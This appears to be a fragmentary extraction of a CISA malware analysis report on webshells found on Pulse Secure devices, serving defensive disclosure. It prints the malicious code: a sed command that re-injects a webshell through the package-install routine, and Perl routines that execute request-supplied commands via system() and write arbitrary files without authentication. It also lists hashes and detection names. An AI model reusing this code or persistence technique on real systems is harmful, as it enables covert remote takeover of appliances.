MAR-10333243.r1.v1: Pulse Secure
Malware Characterization
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
cisa
2021-07-14T10:48:15-04:00
BMachine
40
7.1.0
";
print $console " complete\r\n";
}
else {
print $html " failed";
print $console " failed\r\n";
}
return $status == 0;
}
--End Malicious Code--
The injected code runs the following sed command to modify the Pulse Secure system file “/pkg/do-install” so that the package-install routine itself re-installs the webshell:
--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--
The sed command inserts a line into /pkg/do-install, just ahead of the “Saving package” console message, that (a) runs a second sed against the file `/tmp/data/root$cgi_p` — `$cgi_p` resolves to the legitimate `licenseserverproto.cgi` — replacing its `main();` call with a webshell, and (b) copies `/home/perl/DSUpgrade.pm` (the malicious module characterized below) and `/pkg/dspkginstall` into the staged root under `/tmp/data/root`. The resulting webshell checks each incoming request for a parameter named "id": if present, its value is passed unfiltered to the system() function and executed locally as an operating system command; otherwise the original main() runs and the CGI behaves normally. Because the hook lives in the install routine, the shell is re-applied to the staged image, which appears intended to let it survive package upgrades.]]>
DSUpgrade.pm
5270
Perl5 module source, ASCII text, with very long lines
MD5
d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1
1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256
a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
SHA512
d94795f11c04862b054d2f83babca034c20bfd00c2c0abe1e1fcfdb3854924a0d9944d0f168147060311d948b1bb194f27eaa491563e7b00ba58e776a4a6f676
SSDEEP
96:FYIFAu1JZtGm4OcAHgDfX27AF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX20Dds+gF3Ar8yXp6uIyUMQB
5.03176
Related_To
licenseserverproto.cgi
2105
Perl script text executable
MD5
e50edf64239b84be02ee5902c22ab336
SHA1
1f26ef302ebc881380aa227ddd8eaebdad54679f
SHA256
d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
SHA512
9acee1c2ca0ca24b76c2caab545abaea65e390b6b1f9e058e405bb438ce95eb20a0c1a10512f0b594ebab6dd5f8c0d5228eb3bcf0f8ba1a0f0a35fb0d3410eef
SSDEEP
48:ECLYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:E4YkJAZfv/wO27Y0
5.119005
Related_To
)
{
$fd=$fd.$_;
}
close(*FILE);
print "Content-Disposition: attachment;
filename=tmp\n\n";
print a($fd);
}
# Arbitrary file write. Both the file contents ('cert') and the destination
# path ('md5') come straight from the request; each is passed through sub b,
# which the bracketed note describes as the decryption routine (sub b itself
# lies outside this excerpt). The destination is not restricted to any
# directory, and the 2-arg open performs no separation of mode and path and
# is not checked for failure. Writes happen with whatever privileges the CGI
# runs under.
sub d [Decrypts a file using the (sub b) function above and writes out the file.]
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');  # file body, request-supplied
$fi=b($fi);
my $pa=CGI::param('md5');     # destination path, request-supplied
$pa=b($pa);
open (*outfile, ">$pa");      # 2-arg open, no error check: failures are silent
print outfile $fi;
close (*outfile);
}
# Remote command execution. The 'name' parameter is passed through sub b
# (described above as the decryption routine) and then handed to system()
# as a single shell string, so shell metacharacters are honoured. stdout and
# stderr are redirected into the fixed path /tmp/1, read back, the file is
# unlinked, and the captured output is returned through sub a (not shown here;
# presumably the encode/encrypt counterpart of b). The only commands refused
# are an empty one and the literal "cd", which yield the string "Error 404".
# The response advertises Content-type image/gif, presumably to disguise the
# command output as an image.
sub e [Decrypts an incoming command and executes as system. If the command has the wrong parameter it returns "Error 404".]
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);my $rt;
if (!$na or $na eq "cd")
{
$rt="Error 404";
}
else
{
# Forensic artifact: /tmp/1 is created and deleted on every command. A
# surviving /tmp/1, or one observed in file-system timelines, is a sign the
# shell was used.
my $ot="/tmp/1";
system("$na >/tmp/1 2>&1");   # attacker string executed via /bin/sh
open(*cmd_result,"<$ot");
# NOTE(review): as printed, "while()" is not valid Perl; the readline
# operator (<cmd_result>) was most likely stripped from this listing as an
# HTML tag during extraction.
while()
{
$rt=$rt.$_;
}
close(*cmd_result);
unlink $ot} print a($rt);
}
# POST dispatcher. The mere presence of request parameters, not any credential
# or token, selects the branch:
#   'cert'                       -> d()  file write
#   'img' and 'name'             -> c()  header outside this excerpt; likely the
#                                         file-download routine whose tail is
#                                         printed above
#   'name' with an empty 'img'   -> e()  command execution
#   anything else                -> the original main()
# Nothing in this path authenticates the caller.
sub f [Responses to POST requests.]
{
if(CGI::param('cert')) [If it receives a file it attempts to write it.]
{
d();
}
elsif(CGI::param('img') and CGI::param('name')) [If it receives a command it attempts to execute it.]
{
c();
}
# NOTE(review): the bracketed note on the next line is misleading. This branch
# does execute the command via e(); "Error 404" is only returned by e() for an
# empty command or the literal "cd".
elsif(CGI::param('name') and CGI::param('img') eq "") [If it is unable to execute the command it sends "Error 404".]
{
e();
}
else # [Do normal processing.]
{
&main();
}
}
# Entry-point hook. Only POST requests are routed into the webshell dispatcher
# f(); every other request method falls through to the legitimate main(), so
# non-POST traffic to this CGI behaves as the original script would. Detection
# opportunity: POSTs to this CGI carrying 'cert', 'img' or 'name' parameters.
if ($ENV{'REQUEST_METHOD'} eq "POST") [If its a POST request follow (sub f) function above.]
{
f();
}
else
{
&main(); [Do normal processing.]
}
---End Malicious Code---
The last part of this file contains modified code that renders a dialog box allowing an operator to search for files to download. Before download, each file is RC4 encrypted and then base64 encoded; the RC4 key is hard-coded in the script.]]>
healthcheck.cgi
9272
Perl script text executable
MD5
f23e94a38f0a93df46ba83786f3180e0
SHA1
2f1eddf6af9284f6b6c0a8b14fc3e5986ee601c7
SHA256
ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496
SHA512
ec6b5f25ccdf9a251ff8ba10086820c4cf841e1d487f242edf1f6d7b1b2437f6b2fd12b80989c80a008fb5e7469713971afb39703df7ee556df24669a3124e0d
SSDEEP
192:5zwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yi3hm:5zwJwrXWOUV9AWojoiOujQ
5.114695
licenseserverproto.cgi
2104
Perl script text executable
MD5
a0ce730cffc65e6950c6a5d1d2de0ebb
SHA1
620bfbc94296271c3c6d71b97a8b5486d63347b3
SHA256
bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
SHA512
c2102a112e7fd41cda15fbab438b6b849e072beaaf0650d209fb9b4350e260cb3a611eac3acf9f2aa6c8ce9be071aed1362db7619f14d94990d00cada4256b77
SSDEEP
48:E1LYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:EJYkJAZfv/wO27Y0
5.12004
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1
1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256
a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
NCCIC
2021-07-14T16:34:39+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
e50edf64239b84be02ee5902c22ab336
SHA1
1f26ef302ebc881380aa227ddd8eaebdad54679f
SHA256
d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
NCCIC
2021-07-14T16:34:39+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
f23e94a38f0a93df46ba83786f3180e0
SHA1
2f1eddf6af9284f6b6c0a8b14fc3e5986ee601c7
SHA256
ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496
NCCIC
2021-07-14T16:34:40+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
a0ce730cffc65e6950c6a5d1d2de0ebb
SHA1
620bfbc94296271c3c6d71b97a8b5486d63347b3
SHA256
bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
NCCIC
2021-07-14T16:34:40+00:00
MAEC Characterization of d855ebd2adeaf2b3c87b28e77e9ce4d4
ClamAV
Unix.Trojan.ATRIUM-9855919-0
trojan
webshell
MAEC Characterization of f23e94a38f0a93df46ba83786f3180e0
Symantec
Hacktool.Webshell
10333243.r1.v1
Malicious Code
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected